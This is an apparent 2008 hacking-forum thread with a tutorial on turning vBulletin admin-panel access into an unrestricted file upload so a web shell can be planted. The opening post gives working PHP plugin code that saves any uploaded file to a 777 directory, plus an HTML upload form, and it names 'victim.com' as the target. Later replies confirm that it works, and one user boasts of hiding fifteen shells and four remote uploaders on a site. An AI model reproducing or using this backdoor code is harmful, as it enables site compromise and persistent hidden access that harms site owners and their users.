 |
|
 |
 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 175
 Members: 0
 Total: 175
|
|
|
|
|
|
Full disclosure |
|
CyberDanube Security Research 20251014-0 | Multiple Vulnerabilities in Phoenix Contact QUINT4 UPS
apis.google.com - Insecure redirect via __lu parameter(exploited in the wild)
Urgent Security Vulnerabilities Discovered in Mercku Routers Model M6a
Re: Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
[SBA-ADV-20250730-01] CVE-2025-39664: Checkmk Path Traversal
[SBA-ADV-20250724-01] CVE-2025-32919: Checkmk Agent Privilege Escalation via Insecure Temporary Files
CVE-2025-59397 - Open Web Analytics SQL Injection
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Defense in depth -- the Microsoft way (part 93): SRP/SAFERwhitelisting goes black on Windows 11
Re: [FD]: "Glass Cage" – Zero-Click iMessage ? Persistent iOS Compromise + Bricking (CVE-2025-24085 / 24201, CNVD-2025-07885)
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Samtools v1.22.1 Uncontrolled Memory Allocation from Large BED Intervals Causes Denial-of-Service in Samtools/HTSlib
Samtools v1.22.1 Improper Handling of Excessive Histogram Bin Counts in Samtools Coverage Leads to Stack Overflow
|
|
|
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
Uploading a Shell to vBulletin[All Versions] |
|
 Posted: Wed Dec 31, 2008 12:46 am |
 |
|
| Lymon |
| Beginner |
 |
|
| Joined: Sep 26, 2008 |
| Posts: 2 |
|
|
|
 |
|
 |
|
Uploading Shell's To vBulletin Forums Via ACP
Thing's you'll need.
• Administrator Account Capable of Making Plugins
• An HTML Enabled Forum
• Or Template editing abilities.
• Folder chmod 777 for uploading. I used (images/avatars).
First thing is first, login to the Admin control panel.
The Scroll down on the side untill you see Plugins and Products.
Select New Plugin and you should get something like:
For the Hook Location Select Ajax_Complete
The Title isn't Important, name it whatever you want.
Execution order should be 5
And the code will be as follows:
| Code: | $target_path = "images/avatars"; //edit this to your directory that is 777
$target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
echo "The file ". basename( $_FILES['uploadedfile']['name']).
" has been uploaded";
} else{
echo "There was an error uploading the file, please try again!";
}
|
And finally set the plugin as active,
It should be as followed:
Once you've saved visit
http://victim.com/forums/ajax.php
You should get a "No input File Specified" if you get that then you can continue, if not retry the first few steps!
~~~~~~~~~~~~~~~~~~Part 2~~~~~~~~~~~~~~~~~~~~~~~~~
Your Almost Done!
Next we need a place where we can choose the file to upload...hmmm
Let's try good ol' HTML
| Code: | <form enctype="multipart/form-data" action="ajax.php" method="POST">
<input type="hidden" name="MAX_FILE_SIZE" value="100000" />
Choose a file to upload: <input name="uploadedfile" type="file" /><br />
<input type="hidden" name="s" value="$session[sessionhash]" />
<input type="hidden" name="securitytoken" value="$bbuserinfo[securitytoken]" />
<input type="submit" value="Upload File" />
</form>
|
Place that anywhere on the site where HTML is enabled OR edit the Template and BAM you have yourself a way to upload the shell, OR any other file for that matter 
Tutorial By: Lymon
Please do not re-distribute without my permission.
Thanks & Good Luck! |
|
|
|
|
|
|
|
|
| Posted: Wed Dec 31, 2008 1:13 am |
|
|
| r00tfate1 |
| Beginner |
|
|
| Joined: Dec 31, 2008 |
| Posts: 1 |
|
|
|
|
|
|
|
Yep ive used be4 it works like a charm 
this prolly works on other forums as well |
|
|
|
|
| Posted: Wed Dec 31, 2008 6:30 am |
|
|
| tehhunter |
| Valuable expert |
|
|
| Joined: Nov 19, 2008 |
| Posts: 261 |
|
|
|
|
|
|
|
Great post, I'll refer others to it.  |
|
|
|
|
|
Am getting bellow error. |
|
| Posted: Wed Apr 15, 2009 6:38 am |
|
|
| transfer |
| Regular user |
|
|
| Joined: Apr 14, 2009 |
| Posts: 11 |
|
|
|
|
|
|
|
Am getting bellow error.
Parse error: syntax error, unexpected '<' in /home/XXXXX/public_html/ajax.php(754) : eval()'d code on line 1
Any one guide me..
Thanks in advance |
|
|
|
|
| Posted: Wed Apr 15, 2009 5:39 pm |
|
|
| -AO- |
| Advanced user |
 |
|
| Joined: Jul 15, 2008 |
| Posts: 205 |
| Location: United States |
|
|
|
|
|
|
| You didn't wrap the php code with <? ?> did you? If you did take them off... |
|
|
|
|
| Posted: Thu Apr 30, 2009 10:33 pm |
|
|
| Overhit |
| Beginner |
|
|
| Joined: Apr 30, 2009 |
| Posts: 3 |
|
|
|
|
|
|
|
| Works wonderfully for me, I have 15 shells hidden on this site, and 4 remote uploaders hidden in the site. |
|
|
|
|
www.waraxe.us Forum Index -> vBulletin Board
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|
